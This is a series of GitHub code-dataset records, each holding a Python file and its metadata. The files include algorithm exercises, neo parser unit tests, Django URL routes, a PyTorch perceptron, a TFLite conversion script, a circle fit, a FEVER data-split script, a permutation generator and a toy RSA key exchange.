__init__(self):\r\n        pass\r\n    def Input(self):\r\n        arr = [int(i) for i in input().strip().split()]\r\n        return arr\r\n    def Print(self,arr):\r\n        for i in arr:\r\n            print(i,end=\" \")\r\n        print()\r\n\r\nif __name__ == \"__main__\":\r\n    t = int(input())\r\n    for i in range(t):\r\n        N = int(input())\r\n        arr = IntArray().Input()\r\n        obj = Solution()\r\n        res = obj.minimumBuckets(N,arr)\r\n        print(res)\r\n\r\n\r\n\r\n\r\n","repo_name":"santha22/PythonPrograms","sub_path":"GFG/GeekssPlant.py","file_name":"GeekssPlant.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"27220542449","text":"# Problem: in an array of 1s and 0s, what is the maximum length of a subarray containing an equal number of 1s and 0s?\n\n# Two pointers are hard to apply here because it is unclear under which condition each pointer should move\n# As in the previous problem, use prefix sums and a hash table, \n# time complexity O(n), space complexity O(n)\n\n# Key point: since the input consists of 1s and 0s, replace 0 with -1 and use prefix sums; equal counts make the total sum 0\n# The same substitution would work even for alphabetic inputs\n\n# Key point: the sum of a subarray equals the prefix sum minus the prefix sum accumulated just before that subarray.\n\n\nfrom typing import List\n\ndef findMaxLength(nums: List[int]) -> int:\n    \n    for idx in range(len(nums)):\n        if nums[idx] == 0 :\n            nums[idx] = -1\n    \n    cml_sums = []\n    tmp_sum = 0\n    for num in nums:\n        tmp_sum += num\n        cml_sums.append(tmp_sum)\n    \n    table = {}\n    max_length = 0\n    table[0] = [-1]\n    \n    for idx, cml_sum in enumerate(cml_sums):\n        if cml_sum not in table:\n            table[cml_sum] = [idx]\n        else:\n            table[cml_sum].append(idx)\n        \n        indices = table[cml_sum]\n        first_idx = indices[0]\n        last_idx = indices[-1]\n        length = last_idx - first_idx\n        max_length = max(max_length,length)\n        \n    return max_length\n\nfindMaxLength(nums=[1,0,1,1,1,0,0,1,1])\n\n\n##################################################\n\n\ndef contigArray(nums: List[int]) -> int:\n    \n    for idx, num in enumerate(nums):\n        if num == 0:\n            nums[idx] = -1\n\n    accumNums = []\n    tempNum = 0\n    for num in nums:\n        tempNum += num\n        accumNums.append(tempNum)\n\n    maxLength = 0\n    hashTable = {}\n    hashTable[0] = [-1] # if the matching subarray starts at index 0, treat index -1 as having prefix sum 0 so that subarray's length can still be computed\n    # key point: a subarray sum equals the prefix sum minus the prefix sum (target) just before the subarray, so here we look for subarrays whose sum is 0\n    # accNum - target = sum\n    for idx, accumNum in enumerate(accumNums): # per prefix sum, the hash table stores its indices in ascending order. target = accNum - sum, and since sum = 0, target = accNum, so we just look for the same prefix sum again\n        if accumNum not in hashTable:\n            hashTable[accumNum] = [idx] # store only the indices sharing the same prefix sum as a list in the hash table\n        else:\n            hashTable[accumNum].append(idx) # target = accNum - sum, and since sum = 0, target = accNum, so we just look for the same prefix sum again\n\n        startIdx = hashTable[accumNum][0] \n        endIdx = hashTable[accumNum][-1]\n        lenth = endIdx - startIdx # prefix sum up to startIdx == prefix sum up to endIdx, so the sum over startIdx+1 ~ endIdx is 0; the length of that zero-sum subarray is the difference of the two indices\n        maxLength = max(maxLength, lenth) # the problem asks for the maximum length, so take the max; 
it keeps being updated as the loop runs.\n\n    return maxLength\n\n","repo_name":"badoil/algorithms","sub_path":"algo5.hash/hash5.contiguousArray.py","file_name":"hash5.contiguousArray.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"37727206382","text":"\"\"\"\nTests of neo.rawio.phyrawio\n\nAuthor: Regimantas Jurkus\n\n\"\"\"\n\nimport unittest\n\nfrom neo.rawio.phyrawio import PhyRawIO\n\nfrom neo.test.rawiotest.common_rawio_test import BaseTestRawIO\n\nimport csv\nimport tempfile\nfrom pathlib import Path\nfrom collections import OrderedDict\nimport sys\n\n\nclass TestPhyRawIO(BaseTestRawIO, unittest.TestCase):\n    rawioclass = PhyRawIO\n    entities_to_download = [\n        'phy'\n    ]\n    entities_to_test = [\n        'phy/phy_example_0'\n    ]\n\n    def test_csv_tsv_parser_with_csv(self):\n        csv_tempfile = Path(tempfile.gettempdir()).joinpath('test.csv')\n        with open(csv_tempfile, 'w') as csv_file:\n            csv_writer = csv.writer(csv_file, delimiter=',')\n            csv_writer.writerow(['cluster_id', 'some_annotation', 'some_other_annotation'])\n            csv_writer.writerow([1, 'Good', 'Bad'])\n            csv_writer.writerow([2, 10, -2])\n            csv_writer.writerow([3, 1.23, -0.38])\n\n        # the parser in PhyRawIO runs csv.DictReader to parse the file\n        # csv.DictReader for python version 3.6+ returns list of OrderedDict\n        if (3, 6) <= sys.version_info < (3, 8):\n            target = [OrderedDict({'cluster_id': 1,\n                                   'some_annotation': 'Good',\n                                   'some_other_annotation': 'Bad'}),\n                      OrderedDict({'cluster_id': 2,\n                                   'some_annotation': 10,\n                                   'some_other_annotation': -2}),\n                      OrderedDict({'cluster_id': 3,\n                                   'some_annotation': 1.23,\n                                   'some_other_annotation': -0.38})]\n\n        # csv.DictReader for python version 3.8+ returns list of dict\n        elif sys.version_info >= (3, 8):\n            target = [{'cluster_id': 1,\n                       'some_annotation': 'Good',\n                       'some_other_annotation': 'Bad'},\n                      {'cluster_id': 2,\n                       'some_annotation': 10,\n                       'some_other_annotation': -2},\n                      {'cluster_id': 3,\n                       'some_annotation': 1.23,\n                       'some_other_annotation': -0.38}]\n\n        list_of_dict = PhyRawIO._parse_tsv_or_csv_to_list_of_dict(csv_tempfile)\n\n        self.assertEqual(target, list_of_dict)\n\n    def test_csv_tsv_parser_with_tsv(self):\n        tsv_tempfile = Path(tempfile.gettempdir()).joinpath('test.tsv')\n        with open(tsv_tempfile, 'w') as tsv_file:\n            tsv_writer = csv.writer(tsv_file, delimiter='\\t')\n            tsv_writer.writerow(['cluster_id', 'some_annotation'])\n            tsv_writer.writerow([1, 'Good'])\n            tsv_writer.writerow([2, 10])\n            tsv_writer.writerow([3, 1.23])\n\n        # the parser in PhyRawIO runs csv.DictReader to parse the file\n        # csv.DictReader for python version 3.6+ returns list of OrderedDict\n        if (3, 6) <= sys.version_info < (3, 8):\n            target = [OrderedDict({'cluster_id': 1,\n                                   'some_annotation': 'Good'}),\n                      OrderedDict({'cluster_id': 2,\n                                   'some_annotation': 10}),\n                      OrderedDict({'cluster_id': 3,\n                                   'some_annotation': 1.23})]\n\n        # csv.DictReader for python version 3.8+ returns list of dict\n        elif sys.version_info >= (3, 8):\n            target = [{'cluster_id': 1, 'some_annotation': 'Good'},\n                      {'cluster_id': 2, 'some_annotation': 10},\n                      {'cluster_id': 3, 'some_annotation': 1.23}]\n\n        list_of_dict = PhyRawIO._parse_tsv_or_csv_to_list_of_dict(tsv_tempfile)\n\n        self.assertEqual(target, list_of_dict)\n\n    def test_csv_tsv_parser_error_raising(self):\n        txt_tempfile = Path(tempfile.gettempdir()).joinpath('test.txt')\n        with open(txt_tempfile, 'w') as txt_file:\n            txt_file.write('This is a test')\n\n        self.assertRaises(ValueError,\n                          
PhyRawIO._parse_tsv_or_csv_to_list_of_dict,\n txt_tempfile)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"NeuralEnsemble/python-neo","sub_path":"neo/test/rawiotest/test_phyrawio.py","file_name":"test_phyrawio.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"78"} +{"seq_id":"9931065032","text":"from django.urls import path\nfrom . import views \nfrom .views import UserQuestionsListView, QuestionUpdateView\n\nurlpatterns = [\n path('', views.home, name='library-home'),\n path('it_sems/', views.it_sems, name='library-it-sems'),\n path('cse_sems/', views.cse_sems, name='library-cse-sems'),\n path('ece_sems/', views.ece_sems, name='library-ece-sems'),\n path('eee_sems/', views.eee_sems, name='library-eee-sems'), \n path('it_sem1/', views.it_sem1, name='library-it-sem1'), \n path('it_sem2/', views.it_sem2, name='library-it-sem2'), \n path('it_sem3/', views.it_sem3, name='library-it-sem3'), \n path('it_sem4/', views.it_sem4, name='library-it-sem4'), \n path('it_sem5/', views.it_sem5, name='library-it-sem5'), \n path('it_sem6/', views.it_sem6, name='library-it-sem6'), \n path('it_sem7/', views.it_sem7, name='library-it-sem7'), \n path('cse_sem1/', views.cse_sem1, name='library-cse-sem1'), \n path('cse_sem2/', views.cse_sem2, name='library-cse-sem2'), \n path('cse_sem3/', views.cse_sem3, name='library-cse-sem3'), \n path('cse_sem4/', views.cse_sem4, name='library-cse-sem4'), \n path('cse_sem5/', views.cse_sem5, name='library-cse-sem5'), \n path('cse_sem6/', views.cse_sem6, name='library-cse-sem6'), \n path('cse_sem7/', views.cse_sem7, name='library-cse-sem7'), \n path('ece_sem1/', views.ece_sem1, name='library-ece-sem1'), \n path('ece_sem2/', views.ece_sem2, name='library-ece-sem2'), \n path('ece_sem3/', views.ece_sem3, name='library-ece-sem3'), \n path('ece_sem4/', views.ece_sem4, name='library-ece-sem4'), \n path('ece_sem5/', views.ece_sem5, name='library-ece-sem5'), \n path('ece_sem6/', views.ece_sem6, name='library-ece-sem6'), \n path('ece_sem7/', views.ece_sem7, name='library-ece-sem7'), \n path('it_sem3_DMA/',views.it_sem3_DMA, name='library-it-sem3-DMA'), \n path('subjectview_sem3/', views.subjectview_sem3 , name='subjectview_sem3'),\n path('subjectview_sem1/', views.subjectview_sem1 , name='subjectview_sem1'),\n path('subjectview_sem2/', views.subjectview_sem2 , name='subjectview_sem2'),\n path('subjectview_sem4/', views.subjectview_sem4 , name='subjectview_sem4'),\n path('subjectview_sem5/', views.subjectview_sem5 , name='subjectview_sem5'),\n path('subjectview_sem6/', views.subjectview_sem6 , name='subjectview_sem6'),\n path('subjectview_sem7/', views.subjectview_sem7 , name='subjectview_sem7'),\n path('subjectview_sem8/', views.subjectview_sem8 , name='subjectview_sem8'),\n path('stackoverflow-home/',views.stack_home,name='stackoverflow-home'),\n path('detail//',views.detail,name='stackoverflow-detail_page'),\n path('save-comment',views.save_comment,name='save-comment'),\n path('save-upvote',views.save_upvote,name='save-upvote'),\n path('save-downvote',views.save_downvote,name='save-downvote'),\n path('ask-question',views.ask_form,name='ask-question'),\n path('tag/',views.tag,name='tag'),\n path('profile/',views.profile,name='profile'),\n path('tags/',views.tags,name='tags'),\n path('user/', UserQuestionsListView.as_view(), name='user-qstns'),\n path('detail//update/', QuestionUpdateView.as_view() , name='qstn-update'),\n 
\n]\n","repo_name":"keerthi-aluvala/stackoverflow_cum_library","sub_path":"elibrary/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45093505072","text":"import torch\nfrom sklearn.model_selection import train_test_split\nimport datetime\nimport numpy as np\nimport random as rd\nfrom ds import CourseDataset\n\nclass PerceptronMulticapaPT:\n def __init__(self):\n self.model=torch.nn.Sequential()\n self.model.append(torch.nn.Linear(3,32))\n self.model.append(torch.nn.Sigmoid())\n self.model.append(torch.nn.Linear(32,1))\n self.model.append(torch.nn.Sigmoid())\n self.criterio=torch.nn.BCELoss()\n self.optimizer=torch.optim.SGD(self.model.parameters(),lr=0.01)\n\n def train(self,x,y,xv,yv):\n self.model.train()\n epochs=128\n for epoch in range(epochs):\n self.optimizer.zero_grad()\n y_pred=self.model(x)\n loss=self.criterio(y_pred.squeeze(),y)\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n loss.backward()\n self.optimizer.step()\n\nX=[]\nY=[]\narchivo=open(\"dataset_ejemplo_40_3_16.csv\")\narchivo.readline()\nfor linea in archivo:\n linea=linea.strip().split(\";\")\n x=list(map(float,[linea[1],linea[2],linea[3]]))\n y=1 if linea[0]==\"R\" else 0\n X.append(x)\n Y.append(y)\narchivo.close()\nX=torch.FloatTensor(X)\nY=torch.FloatTensor(Y)\nseed=121208\nrd.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nmlp=PerceptronMulticapaPT()\nx_train, x_val, y_train, y_val = train_test_split(X, Y, test_size=0.3, stratify=Y, random_state=1)\nmlp.train(x_train,y_train,x_val,y_val)","repo_name":"pabloschwarzenberg/CINF104","sub_path":"mlp/mlp_p.py","file_name":"mlp_p.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"18741285782","text":"def isUniqueChar1(s):\n # using data structure: set\n str_set = set(s)\n if len(s) == len(str_set): # check the length\n return True\n return False\n\n\ndef isUniqueChar2(s):\n # simple comparison of each character\n for i in range(len(s) - 1):\n for j in range(i + 1, len(s)):\n if s[i] == s[j]:\n return False\n return True\n\n\ndef isUniqueChar3(s):\n # using python function count\n for letter in s:\n if s.count(letter) > 1:\n return False\n return True\n\n\ndef isUniqueCharUsingASCII(s):\n # using ASCII\n if len(s) > 256:\n return False\n\n letter_bool = [False] * 256\n for letter in s:\n # ord returns ASCII\n if letter_bool[ord(letter)] is True:\n return False\n else:\n letter_bool[ord(letter)] = True\n return True\n\n\nimport unittest\n\n\nclass noDupTestClass(unittest.TestCase):\n\n test_data = [('a', True),\n ('aa', False),\n ('ab', True),\n ('ab ', True),\n ('', True),\n (' ', True),\n (' ', False),\n ('qwerty', True),\n ('qwerte', False)\n ]\n\n def runTest(self):\n for s, ans in self.test_data:\n r1 = isUniqueChar1(s)\n self.assertEqual(r1, ans)\n\n r2 = isUniqueChar2(s)\n self.assertEqual(r2, ans)\n\n r3 = isUniqueChar3(s)\n self.assertEqual(r3, ans)\n\n r4 = isUniqueCharUsingASCII(s)\n self.assertEqual(r4, ans)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SungGV/algorithmPractice","sub_path":"algorithms/cracking the code/1-1.py","file_name":"1-1.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9020631971","text":"'''Generating permutations for list of numbers.\n\n'''\ndef 
find_number(prefix, number):\n    '''Find selected number in current prefix of permutations.\n    If number is found, returns True, else False.\n\n    Keyword arguments:\n    prefix -- list of numbers (list)\n    number -- number for checking (int)\n\n    '''\n    res = False\n    for i in prefix:\n        if i == number:\n            res = True\n            break\n    return res\n\ndef generate_permutations(num_amount: int, pos_amount: int = -1, prefix = None):\n    '''Generate all permutations for num_amount numbers in pos_amount\n    positions with prefix.\n\n    Keyword arguments:\n    num_amount -- numbers from 1 to num_amount are the numbers for\n    generating permutations (int)\n    pos_amount -- number of remaining positions for generating permutations\n    with the current prefix (int)\n    prefix -- generated part of permutation (list)\n\n    '''\n    # num_amount numbers in num_amount positions by default\n    pos_amount = num_amount if pos_amount == -1 else pos_amount\n    prefix = prefix or []\n    if pos_amount == 0:\n        print(*prefix)\n        return\n    for number in range(1, num_amount + 1):\n        if find_number(prefix, number):\n            continue\n        prefix.append(number)\n        generate_permutations(num_amount, pos_amount - 1, prefix)\n        del prefix[-1]\n\ndef test_permutations():\n    '''Common test for permutations.\n\n    '''\n    test_case_gen_numbers(3, \"1\")\n    test_case_gen_numbers(4, \"2\")\n    test_case_gen_numbers(5, \"3\")\n\ndef test_case_gen_numbers(num_base, case_name):\n    '''Test case for generating numbers.\n\n    '''\n    print(\"testcase #\", case_name, sep = \": \")\n    generate_permutations(num_base)\n\nif __name__ == '__main__':\n    test_permutations()\n","repo_name":"avoevodin/lab2","sub_path":"recursion_generate_permutations.py","file_name":"recursion_generate_permutations.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"42932937290","text":"#basic_app urls.py\nfrom django.conf.urls import url###\nfrom basic_app import views###\n\n\n# TEMPLATE URLS!\napp_name = 'basic_app'\n\n# Be careful setting the name to just /login use userlogin instead!\nurlpatterns=[\n    url('register/', views.register, name ='register'),\n    url('user_login/', views.user_login, name ='user_login'),\n    #url('',views.index, name ='index'),\n]\n","repo_name":"joracornev/django_deployment_example","sub_path":"basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"27946691805","text":"from numpy import *\r\nfrom scipy import optimize, odr\r\nimport functools\r\nfrom matplotlib import pyplot as plt, cm, colors\r\n\r\nplt.rcParams[\"font.sans-serif\"] = [\"SimHei\"]  # set the font\r\nplt.rcParams[\"axes.unicode_minus\"] = False  # this line fixes the garbled rendering of the minus sign '-' in figures\r\n\r\n# Method 1: algebraic approximation\r\nmethod_1 = 'algebraic approximation '\r\n# coordinates\r\nx = r_[14, 15, 15, 16, 16, 17, 17, 18, 19, 20, 20, 21, 22, 23, 24, 25, 26, 26, 27, 28, 29, 30, 31, 32]\r\ny = r_[-261, -260, -261, -259, -260, -258, -259, -258, -257, -256, -257, -255, -254, -254, -253, -253, -252, -253, -252, -251, -251, -250, -250, -250]\r\n\r\nx_m = mean(x)\r\ny_m = mean(y)\r\n\r\nmethod_2 = \"least squares \"\r\n\r\n\r\n# decorator: used to report call counts\r\ndef countcalls(fn):\r\n    \"decorator that counts function calls \"\r\n\r\n    @functools.wraps(fn)\r\n    def wrapped(*args):\r\n        wrapped.ncalls += 1\r\n        return fn(*args)\r\n\r\n    wrapped.ncalls = 0\r\n    return wrapped\r\n\r\n\r\ndef calc_R(xc, yc):\r\n    \"\"\" compute the distance of the data points from the center (xc, yc) \"\"\"\r\n    return sqrt((x - xc) ** 2 + (y - yc) ** 2)\r\n\r\n\r\n@countcalls\r\ndef f_2(c):\r\n    \"\"\" compute the radius residuals\"\"\"\r\n    Ri = calc_R(*c)\r\n    return Ri - Ri.mean()\r\n\r\n\r\n# 
estimate of the circle center\r\ncenter_estimate = x_m, y_m\r\ncenter_2, _ = optimize.leastsq(f_2, center_estimate)\r\n\r\nxc_2, yc_2 = center_2\r\nRi_2 = calc_R(xc_2, yc_2)\r\n# radius of the fitted circle\r\nR_2 = Ri_2.mean()\r\nresidu_2 = sum((Ri_2 - R_2) ** 2)\r\nresidu2_2 = sum((Ri_2 ** 2 - R_2 ** 2) ** 2)\r\nncalls_2 = f_2.ncalls\r\n\r\nfmt = '%-22s %10.5f %10.5f %10.5f '\r\nprint('-' * (22 + 4 * (10 + 1)))\r\nprint(fmt % (method_2, xc_2, yc_2, R_2))\r\n\r\n\r\ndef plot_all(residu=False):\r\n    plt.figure(facecolor='white')  # figsize=(7, 5.4), dpi=72,\r\n    plt.axis('equal')\r\n    theta_fit = linspace(-pi, pi, 180)\r\n\r\n    x_fit2 = xc_2 + R_2 * cos(theta_fit)\r\n    y_fit2 = yc_2 + R_2 * sin(theta_fit)\r\n    plt.plot(x_fit2, y_fit2, 'bo-', label=method_2, lw=2)\r\n    plt.plot([xc_2], [yc_2], 'gD', mec='r', mew=1)\r\n\r\n    plt.xlabel('x')\r\n    plt.ylabel('y')\r\n\r\n    plt.plot(x, y, 'ro', label='data', ms=8, mec='b', mew=1)\r\n    plt.legend(loc='best', labelspacing=0.1)\r\n\r\nplot_all(residu=True)\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jockLeee/gap-detection","sub_path":"识别圆最小二乘.py","file_name":"识别圆最小二乘.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"39861551778","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n    path(\"students/register/\", views.StudentSignUpView.as_view(),\n         name=\"student-register\"),\n    path(\"student/profile/\", views.student_profile, name=\"student-profile\"),\n    path(\"student/profile/complete/\", views.student_profile_completion,\n         name=\"student-profile-complete\"),\n    path(\"student/logout/\", views.logoutPage, name=\"logout\"),\n    path(\"students/\", views.StudentListView.as_view(), name=\"student-list\"),\n    # student's course\n\n    path(\"students/courses/\", views.StudentCourseListView.as_view(),\n         name=\"student-course-list\"),\n    path(\"students/course//\",\n         views.StudentCourseDetailView.as_view(), name=\"student-course-detail\"),\n    path(\"student/course///\",\n         views.StudentCourseDetailView.as_view(), name=\"student-course-detail-module\"),\n    path(\"students/detail//\",\n         views.student_detail_view, name=\"student-detail\"),\n\n    path('student/semester/report/', views.semester_report, name=\"semester-report\"),\n    path(\"student/general/report/\", views.general_report, name=\"general-report\"),\n]\n","repo_name":"alizada-hadi/Final_Pro","sub_path":"students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"6176166797","text":"# © 2020 - today Numigi (tm) and all its contributors (https://bit.ly/numigiens)\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).\n\nfrom odoo import api, fields, models\nfrom odoo.osv.expression import AND\n\n\nclass AccountInvoiceLine(models.Model):\n\n    _inherit = \"account.invoice.line\"\n\n    @api.model\n    def _timesheet_domain_get_invoiced_lines(self, *args, **kwargs):\n        domain = super()._timesheet_domain_get_invoiced_lines(*args, **kwargs)\n\n        date_from = self._context.get(\"timesheet_date_from\")\n        if date_from:\n            domain = AND([domain, [('date', '>=', date_from)]])\n\n        date_to = self._context.get(\"timesheet_date_to\")\n        if date_to:\n            domain = AND([domain, [('date', '<=', date_to)]])\n\n        return 
domain\n","repo_name":"Numigi/odoo-sale-addons","sub_path":"sale_timesheet_invoicing_period/models/account_invoice_line.py","file_name":"account_invoice_line.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3394010081","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\n\ninput_mean = 127.5\ninput_std = 127.5\n\n\ndef representative_dataset_gen():\n # https://stackoverflow.com/questions/58775848/tflite-cannot-set-tensor-dimension-mismatch-on-model-conversion\n # https://stackoverflow.com/questions/75267305/how-can-i-pass-my-proper-normalisation-mean-std-values-used-in-training-to-the-t\n # https://stackoverflow.com/questions/1735025/how-to-normalize-a-numpy-array-to-within-a-certain-range\n for f_name in os.listdir('images'):\n file_path = os.path.normpath(os.path.join('images', f_name))\n img = cv2.imread(file_path)\n img = cv2.resize(img, (320, 320))\n img = 2. * (img - np.min(img)) / np.ptp(img) - 1\n img = np.reshape(img, (1, 320, 320, 3))\n image = img.astype(np.float32)\n yield [image]\n\n\nconverter = tf.lite.TFLiteConverter.from_saved_model('inference_graph_adam/saved_model')\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset_gen\nconverter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]\nconverter.inference_input_type = tf.uint8\n# converter.inference_output_type = tf.int8 # alebo tf.uint8\n# converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, tf.lite.OpsSet.SELECT_TF_OPS]\ntflite_model = converter.convert()\n\nwith open('detect.tflite', 'wb') as f:\n f.write(tflite_model)\n","repo_name":"adam-ruzicka/Train-face-mask-detection-object-detection","sub_path":"convert_to_tflite.py","file_name":"convert_to_tflite.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28068172145","text":"import pandas as pd \nimport pickle \nimport numpy as np\nimport json\n\nfrom sklearn.model_selection import train_test_split\n\ndef split_dataset():\n\n\tdataset_path = \"train_fever_binary.json\"\n\tdataset = pd.read_json(dataset_path)\n\t# dataset = json.load(open(dataset_path, \"r\"))\n\t\n\ttrain, validate = train_test_split(dataset, test_size=0.1)\n\n\twith open('train_fever_binary_split.json', 'w') as outfile:\n\n\t\tjson.dump(train, outfile)\n\n\twith open('validate_fever_binary.json', 'w') as outfile:\n\n\t\tjson.dump(validate, outfile)\n\n\ndef create_dataset(dataset):\n\n\t\n\t\n\tlist_ = []\n\t\n\tcount = 0\n\tfor i in range(len(dataset)):\n\n\t\tdict_ = {}\n\t\tdict_[\"claim\"] = dataset[\"claim\"].iloc[i]\n\t\tdict_[\"triples\"] = dataset[\"triples\"].iloc[i]\n\t\tdict_[\"sentence\"] = dataset[\"sentence\"].iloc[i]\n\t\tif dataset[\"label\"].iloc[i] == 0 or dataset[\"label\"].iloc[i] == 1:\n\t\t\tdict_[\"label\"] = 0\n\t\telse:\n\t\t\tdict_[\"label\"] = 1\n\t\tlist_.append(dict_)\n\n\n\t# print (list_)\n\n\twith open('fever_binary.json', 'w') as outfile:\n\n\t\tjson.dump(list_, outfile)\n\n\nif __name__ == '__main__':\n\n \n\t\tdataset_path = \"../3-class/fever_3.json\"\n\t\tdataset = pd.read_json(dataset_path)\n\n\t\t# 
create_dataset(dataset)\n\t\tsplit_dataset()","repo_name":"DeFacto/EvidenceRetrieval-ClaimClassification","sub_path":"data/fever/binary/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"}
{"seq_id":"3511533426","text":"import random\r\nimport math\r\n\r\n\r\ndef miller_test(num, k=8):\r\n    if num == 2 or num == 3:\r\n        return True\r\n\r\n    if num % 2 == 0:\r\n        return False\r\n\r\n    r, s = 0, num - 1\r\n    while s % 2 == 0:\r\n        r += 1\r\n        s //= 2\r\n\r\n    for _ in range(k):\r\n        a = random.randrange(2, num - 1)\r\n        x = pow(a, s, num)\r\n        if x == 1 or x == num - 1:\r\n            continue\r\n        for _ in range(r - 1):\r\n            x = pow(x, 2, num)\r\n            if x == num - 1:\r\n                break\r\n        else:\r\n            return False\r\n    return True\r\n\r\n\r\ndef primary():\r\n    bits = 256\r\n    print(\"Not prime numbers\\n\")\r\n    while True:\r\n        prim_number = (random.randrange(2 ** (bits - 1), 2 ** bits))\r\n        if not miller_test(prim_number):\r\n            print(f\"{prim_number}\")\r\n        else:\r\n            return prim_number\r\n\r\n\r\ndef generete_key():\r\n    while True:\r\n        keys = []\r\n        for _ in range(4):\r\n            key = primary()\r\n            keys.append(key)\r\n        if keys[0] * keys[1] < keys[2] * keys[3]:\r\n            return keys\r\n\r\n\r\ndef evclid_extended(first_number, second_number):\r\n    if first_number == 0:\r\n        return second_number, 0, 1\r\n    else:\r\n        div, koef_x, koef_y = evclid_extended(second_number % first_number, first_number)\r\n        return div, koef_y - (second_number // first_number) * koef_x, koef_x\r\n\r\n\r\ndef mod_inverse(first_number, second_number):\r\n    return list(evclid_extended(first_number, second_number))[1]\r\n\r\n\r\ndef rsa_key_pair(first_key, second_key):\r\n    res = []\r\n    n = first_key * second_key\r\n    oiler = (first_key - 1) * (second_key - 1)\r\n    e = random.randrange(2, oiler - 1)\r\n    while math.gcd(e, oiler) != 1:\r\n        e = random.randrange(2, oiler - 1)\r\n    d = mod_inverse(e, oiler) % oiler\r\n    res.append(d)\r\n    res.append(n)\r\n    res.append(e)\r\n    return res\r\n\r\n\r\ndef encrypting(m, e, n):\r\n    return pow(m, e, n)\r\n\r\n\r\ndef decryption(c, d, n):\r\n    return pow(c, d, n)\r\n\r\n\r\ndef digital_sign(m, d, n):\r\n    return pow(m, d, n)\r\n\r\n\r\ndef sign_check(m, s, e, n):\r\n    return m == pow(s, e, n)\r\n\r\n\r\ndef key_send(k, d, e_1, n_1, n):\r\n    k_1 = encrypting(k, e_1, n_1)\r\n    s = digital_sign(k, d, n)\r\n    s_1 = encrypting(s, e_1, n_1)\r\n    return k_1, s_1\r\n\r\n\r\ndef key_receiving(key_1, s_1, d_1, n_1, e, n):\r\n    key = decryption(key_1, d_1, n_1)\r\n    s = decryption(s_1, d_1, n_1)\r\n    if sign_check(key, s, e, n):\r\n        return True, key\r\n    else:\r\n        return False, 0\r\n\r\n\r\ngen_keys = generete_key()\r\np, q, p_1, q_1 = gen_keys[0], gen_keys[1], gen_keys[2], gen_keys[3]\r\n\r\nrsa_keys_a = rsa_key_pair(p, q)\r\ne, n, d = rsa_keys_a[0], rsa_keys_a[1], rsa_keys_a[2]\r\n\r\nrsa_keys_b = rsa_key_pair(p_1, q_1)\r\ne_1, n_1, d_1 = rsa_keys_b[0], rsa_keys_b[1], rsa_keys_b[2]\r\n\r\n\r\nmessage = random.randint(0, n)\r\nstart_key = random.randint(0, n)\r\nencrypted_key, dig_sign = key_send(start_key, d, e_1, n_1, n)\r\n\r\nencrypted_msg = encrypting(message, e, n)\r\nreceived_key = key_receiving(encrypted_key, dig_sign, d_1, n_1, e, n)\r\ndecrypted_msg = decryption(encrypted_msg, d, n)\r\n\r\nprint(\"\\n㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛ Keys of participant A ㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛\")\r\nprint(f'e: {e}\\nn: {n}\\nd: {d}\\np: {p}\\nq: {q}\\n')\r\n\r\nprint(\"㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛ Keys of participant B ㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛\")\r\nprint(f'e_1: {e_1}\\nn_1: {n_1}\\nd_1: {d_1}\\np_1: {p_1}\\nq_1: 
